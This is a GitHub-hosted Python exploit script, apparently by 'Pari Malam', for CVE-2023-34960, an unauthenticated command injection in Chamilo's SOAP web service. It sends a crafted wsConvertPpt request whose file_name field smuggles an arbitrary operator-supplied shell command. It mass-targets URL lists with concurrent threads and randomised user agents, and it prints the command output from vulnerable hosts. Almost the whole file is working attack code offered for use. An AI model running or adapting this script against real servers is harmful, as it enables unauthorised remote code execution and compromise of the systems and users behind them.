-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathexploit.py
148 lines (122 loc) · 8.58 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
# Author: Pari Malam
import argparse
import random
import warnings
import requests
import os
import xml.etree.ElementTree as ET
from sys import stdout
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style
warnings.filterwarnings("ignore")
FY = Fore.YELLOW
FG = Fore.GREEN
FR = Fore.RED
FC = Fore.CYAN
FW = Fore.WHITE
def clear():
os.system('clear' if os.name == 'posix' else 'cls')
def mkdir():
if not os.path.exists('Results'):
os.mkdir('Results')
def banners():
clear()
stdout.write(" \n")
stdout.write(""+Fore.LIGHTRED_EX +"██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗ \n")
stdout.write(""+Fore.LIGHTRED_EX +"██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝\n")
stdout.write(""+Fore.LIGHTRED_EX +"╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝ \n")
stdout.write(""+Fore.YELLOW +"═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════\n")
stdout.write(""+Fore.YELLOW +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"AUTHOR "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" PARI MALAM "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╔════════════════════════════════════════════════════════════════════════════╝\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" GITHUB.COM/PARI-MALAM "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╚════════════════════════════════════════════════════════════════════════════╝\n")
print(f"{FY}[CVE-2023-34960] - {FG}Unauthenticated Command Injection\n{Style.RESET_ALL}")
banners()
def users_agents():
with open("lib/ua.txt", "r") as ua_file:
user_agents = ua_file.readlines()
user_agents = [ua.strip() for ua in user_agents if ua.strip()]
return user_agents
def chamilo(url, command, user_agents):
url = "http://" + url.strip("/")
body = f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{url}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">`{{}}`.pptx'|" |{command}||a #</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">720x540</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''
headers = {'Content-Type': 'text/xml', 'User-Agent': random.choice(user_agents)}
try:
r = requests.post(f'{url}/main/webservices/additional_webservices.php', data=body, headers=headers, verify=False, timeout=5)
except Exception as e:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid {Style.RESET_ALL}")
return None
if r.status_code == 200:
try:
pwned = ET.fromstring(r.text)
except ET.ParseError:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid XML Response{Style.RESET_ALL}")
return None
tagged = pwned.find('.//return')
if tagged is not None:
content = tagged.text
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FG}[w00t!] - {FC}Vulnerable: {FW}{content}{Style.RESET_ALL}")
return content
else:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not found on execution. Check manually.{Style.RESET_ALL}")
return None
return None
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL address (without 'http://' prefix)")
parser.add_argument("-f", "--filename", help="File containing URLs")
parser.add_argument("-c", "--command", help="Command to execute (optional)")
parser.add_argument("-t", "--threads", type=int, default=10, help="Maximum number of concurrent threads")
parser.add_argument("-o", "--output", help="Output file for saving the results")
args = parser.parse_args()
command = args.command or 'uname -a' or 'whoami'
if args.filename:
with open(args.filename, "r") as url_file:
urls = url_file.readlines()
urls = [url.strip() if url.startswith(("http://", "https://")) else url.strip() for url in urls]
elif args.url:
urls = [args.url]
else:
parser.error(f"{FR}Whut are you doin bro?")
max_workers = args.threads
user_agents = users_agents()
results = []
with ThreadPoolExecutor(max_workers=max_workers) as executor:
futures = [executor.submit(chamilo, url, command, user_agents) for url in urls]
for future, url in zip(futures, urls):
result = future.result()
if result:
results.append((url, result))
else:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not Vulnerable{Style.RESET_ALL}")
if args.output:
with open(args.output, "a") as file:
for url, result in results:
file.write(f"URL: {url}\nResult: Results/{result}\n\n")
if __name__ == '__main__':
main()